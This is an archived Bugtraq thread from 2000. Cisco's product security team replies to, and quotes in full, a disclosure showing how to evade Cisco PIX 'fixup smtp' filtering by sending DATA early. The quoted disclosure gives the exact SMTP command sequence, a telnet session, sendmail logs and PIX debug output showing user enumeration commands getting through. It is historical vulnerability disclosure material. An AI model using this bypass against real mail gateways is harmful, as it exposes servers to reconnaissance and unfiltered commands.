Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Cisco PIX Firewall (smtp content filtering hack)
From: Lisa Napier <lnapier () CISCO COM>
Date: Tue, 19 Sep 2000 18:30:51 -0700

Hi,

We have been working for some time to repair this defect.  We have a
planned advisory to be posted next week.  We do not yet have fixed code to
address this issue, but expect to shortly -- this is what typically holds
up the advisory process, ensuring that we have a solution to the problem
reported.

Unfortunately this posting does not provide a workaround, nor any real
assistance to customers attempting to protect themselves.

We really appreciate prior notification.  We do work to get vulnerabilities
fixed, and in fact were already working diligently on this one.

Thanks much,

Lisa Napier
Product Security Incident Response Team
Cisco Systems


At 06:27 PM 09/19/2000 +0200, naif wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

How to escape "fixup smtp" of  Cisco Pix Firewall:

The Cisco Pix Firewall normally restrict some protocol
command(http,ftp,smtp) and manage
multisession protocol(h323, ftp,sqlnet) .
I made some test on a BSDI3.0 running sendmail9 placed in the dmz .
The Pix version it's the latest, 5.2(1)... here the output of "show ver"
=====================================================
Cisco Secure PIX Firewall Version 5.2(1)

Compiled on Tue 22-Aug-00 23:35 by bhochuli

pixtest1 up 22 days 5 hours

Hardware:   SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB

0: ethernet0: address is 00d0.b790.41a5, irq 11
1: ethernet1: address is 00d0.b790.54d4, irq 10
2: ethernet2: address is 00e0.b601.d289, irq 15
3: ethernet3: address is 00e0.b601.d288, irq 9
4: ethernet4: address is 00e0.b601.d287, irq 11
5: ethernet5: address is 00e0.b601.d286, irq 10

Licensed Features:
Failover:       Enabled
VPN-DES:        Enabled
VPN-3DES:       Enabled
Maximum Interfaces:     6
Cut-through Proxy:      Enabled
Guards:         Enabled
Websense:       Enabled
Throughput:     Unlimited
ISAKMP peers:   Unlimited
=======================================================
The Pix when a new connection are established use his fixup filter to
nullify every command
that aren't in his "allowed list" (such as HELO,MAIL FROM:,RCPT
TO:,DATA,RSET,QUIT)
For example, for the "security trought obscurity" concept he rewrite the
banner of
the original MTA.
This is a sendmail...

220 *********************************************************2000
***0******0200 ******

Now,  pix  nullify help command, and if i write a e-mail to my friend
asking for ''help'', it should drop
the line on wich i write "help".
So, Cisco Pix Firewall, after "data" command, until
"<CR><LF><CR><LF>.<CR><LF>" disable the fixup .
Now what appens if i don't complete the e-mail, or i immediatly type
"data" in place of normal
"helo, mail from,rcpt to,data, quit" ?
Pix disable the fixup and give me a direct channel to the MTA without
doing content filtering.

Here an example of what i could do exploiting this bug:
helo ciao
mail from: pinco () pallino it
data                                 ( From here pix disable fixup)
expn guest                           ( Now i could enumerate user
vrfy oracle                             and have access to all command)
help
whatever command i want
quit

Greeting to Cisco and it's Security Products !

Here log of my test...

- - Ip of the client: 10.10.10.10
- - Public Ip of the Server: 10.10.10.2
- - Private Ip of the Server: 172.16.1.2


=====
The sendmail log:

Sep 19 14:06:19 testbox sendmail[14163]: NOQUEUE: Authentication-Warning:
testbox.test.it: [10.10.10.10] didn't use HELO protocol
Sep 19 14:07:36 testbox sendmail[14164]: NOQUEUE: [10.10.10.10]: expn pinco
Sep 19 14:08:03 testbox sendmail[14165]: NOQUEUE: [10.10.10.10]: vrfy pallino
Sep 19 14:08:50 testbox sendmail[14163]: OAA14163:
from=pix () il firewall cattivo it, size=0, class=0, pri=0, nrcpts=0,
proto=SMTP, relay=[10.10.10.10]



=====
Here the OutPut of "debug fixup tcp" on the pix:

        tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        tcp: SYN out rcvd
        tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        tcp: exiting embyonic
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: unknown command
        smtp: X-ing ciao pix mi vuoi rispondere?

smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: help command
        smtp: nullify <help> command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: mail command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: data command
        smtp: entering data mode

###### From here the pix think that i'm writing the e-mail body, so
disable fixup
###### and i could inject my malicious command without having them nullified.

smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)




Here the telnet session:

naif:~# telnet  10.10.10.2 25
Trying 10.10.10.2...
Connected to 10.10.10.2.
Escape character is '^]'.
220 *********************************************************2000
***0******0200 ******
ciao pix mi vuoi rispondere?
500 Command unrecognized: "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"
help
500 Command unrecognized: "XXXX"
mail from: pix () il firewall cattivo it
250 pix () il firewall cattivo it    Sender ok
data
503 Need RCPT (recipient)

#### LOOK, FROM HERE FIXUP IT'S DISABLED :)))

help
214-This is Sendmail version 8.9.1
214-Topics:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB    ETRN    DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214- sendmail-bugs () sendmail org 214-For local information send email to Postmaster at your site.
214 End of HELP info
expn pinco
550 pinco... User unknown
vrfy pallino
550 pallino... User unknown


The End

Greeting to bolo for the PIX and the BSDI box :)
Kiss to my love NaiL^d0d :****


naif

e-mail:`echo "donlayiufhg () wiltoragpyzagvcm wmdnehhqrstzwr" | tr -d \
              'bdghlmoqrsuvwzy'`

:pp

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org
Filter: gpg4pine 4.1 (http://azzie.robotics.net)

iD8DBQE5x5QLdK5I1NnlcMYRAscOAKCv+DvZ3mx4+7UT6LpFyuEQNlD57gCfRJoB
2FEU8a6f1ZhtmDq82pOh3nE=
=0UD1
-----END PGP SIGNATURE-----


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]